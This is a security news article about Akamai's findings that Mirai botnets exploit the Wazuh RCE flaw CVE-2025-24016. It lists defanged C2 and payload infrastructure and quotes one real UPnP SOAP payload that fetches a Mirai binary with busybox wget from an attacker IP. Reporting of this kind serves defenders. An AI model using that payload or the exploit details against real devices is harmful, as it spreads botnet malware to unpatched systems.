Monday , June 30 2025
Mirai Botnets

CVE-2025-24016
Critical Wazuh RCE Actively Exploited by Mirai Botnets

The Security Intelligence and Response Team (SIRT) at Akamai has found that multiple Mirai-based botnets are exploiting CVE-2025-24016, a critical RCE vulnerability in Wazuh servers. This flaw, which has a CVSS score of 9.9, allows remote attackers to execute arbitrary Python code through unsanitized JSON inputs in the Wazuh Distributed API.

“This is the first reported active exploitation of this vulnerability since the initial disclosure in February 2025,” Akamai wrote in its report.

First couple “Rosie” to conceive using AI tech “STAR” successfully

Doctors at Columbia University Fertility Center have reported what they are calling the first pregnancy using a new AI system,...
Read More
First couple “Rosie” to conceive using AI tech “STAR” successfully

Scattered Spider Actively Attacking Aviation and Transportation: FBI

Cybersecurity experts and federal authorities are warning that the Scattered Spider hackers are now targeting aviation and transportation, indicating a...
Read More
Scattered Spider Actively Attacking Aviation and Transportation: FBI

Russia’s restrictions on Cloudflare making websites inaccessible

Since June 9, 2025, Russian users connecting to Cloudflare services have faced throttling by ISPs. As the throttling is being...
Read More
Russia’s restrictions on Cloudflare making websites inaccessible

61 million Verizon records allegedly posted online for sale

A new report from SafetyDetectives reveals that hackers posted a massive 3.1GB dataset online, containing about 61 million records reportedly...
Read More
61 million Verizon records allegedly posted online for sale

Cyber Expert ‘Rene Joshilda’ Arrested for Bomb Hoaxes

A 30-year-old robotics engineer from Chennai set off alarm bells in 11 states by allegedly sending hoax bomb threats. She...
Read More
Cyber Expert ‘Rene Joshilda’ Arrested for Bomb Hoaxes

Critical RCE Flaws in Cisco ISE and ISE-PIC Allow to Gain Root Access

Cisco has issued updates to fix two critical security vulnerabilities in Identity Services Engine (ISE) and ISE Passive Identity Connector...
Read More
Critical RCE Flaws in Cisco ISE and ISE-PIC Allow to Gain Root Access

CISA Warns of FortiOS Hard-Coded Credentials Vulns

CISA warns about a serious vulnerability in Fortinet FortiOS that threatens network security. CISA included CVE-2019-6693 in its Known Exploited...
Read More
CISA Warns of FortiOS Hard-Coded Credentials Vulns

5 vendors’ printer totaling 748 models affected: Rapid7

Rapid7 has revealed serious vulnerabilities in multifunction printers (MFPs) from Brother, FUJIFILM, Ricoh, and Toshiba Tec Corporation. These findings, covering...
Read More
5 vendors’ printer totaling 748 models affected: Rapid7

Citrix Released Emergency Patches for Actively Exploited CVE-2025-6543

Citrix has issued security updates for a critical vulnerability in NetScaler ADC that has been actively exploited. The vulnerability CVE-2025-6543...
Read More
Citrix Released Emergency Patches for Actively Exploited CVE-2025-6543

SonicWall warns of a trojanized NetExtender stealing VPN logins

SonicWall warned on Monday that unknown attackers have trojanized its SSL-VPN NetExtender application, tricking users into downloading it from fake...
Read More
SonicWall warns of a trojanized NetExtender stealing VPN logins

Disclosed in February 2025, CVE-2025-24016 affects Wazuh versions 4.4.0 to 4.9.0, allowing RCE via a malicious run_as request at the /security/user/authenticate/run_as endpoint.

The flaw in Wazuh is linked to the as_Wazuh_object() deserialization method in Python, which does not properly sanitize dictionary inputs.

“This can be exploited by injecting an unsanitized dictionary into DAPI requests, which can lead to evaluation of arbitrary Python code,” the report explains.

Akamai discovered two unique botnet campaigns exploiting this vulnerability, both based on Mirai malware.

The first wave appeared in early March 2025, shortly after public disclosure of the CVE, targeting IoT devices with a suite of architecture-specific binaries. The malware, dubbed “morte,” is part of the LZRD Mirai family, known for its console string “lzrd here”.

“The exploit fetches and executes a malicious shell script that serves as a downloader for the main Mirai malware payload,” the report explains.

Associated infrastructure includes:

C2 Domain: nuklearcnc.duckdns[.]org
Payload server: 176.65.134[.]62

Additional domains: cbot.galaxias[.]cc, neon.galaxias[.]cc, pangacnc[.]com
In May 2025, Akamai observed a second botnet dubbed “Resbot” exploiting the same vulnerability but using Italian-styled domain names like gestisciweb.com, suggesting targeting of Italian-speaking users.

The malware, “resgod”, prints the console string “Resentual got you!” upon execution and also targets multiple CPU architectures. Its C2 is hardcoded to 104.168.101[.]27 over TCP port 62627.

“It was using a variety of domains to spread the malware that all had Italian nomenclature… possibly alluding to the targeted geography or language spoken by the affected device owner,” the report notes.

In addition to CVE-2025-24016, the botnets were observed chaining exploits from past years, including:

CVE-2023-1389 (TP-Link)
CVE-2017-17215 (Huawei HG532)
CVE-2017-18368 (D-Link)
Exploits targeting Ivanti, UPnP, and YARN APIs

One attack string specifically crafted for UPnP exploitation via SOAP contained this payload:

<NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>

These actions underscore a well-resourced and automated offensive campaign to compromise exposed and outdated infrastructure.

Check Also

ISE PIC

Critical RCE Flaws in Cisco ISE and ISE-PIC Allow to Gain Root Access

Cisco has issued updates to fix two critical security vulnerabilities in Identity Services Engine (ISE) …

Leave a Reply

Your email address will not be published. Required fields are marked *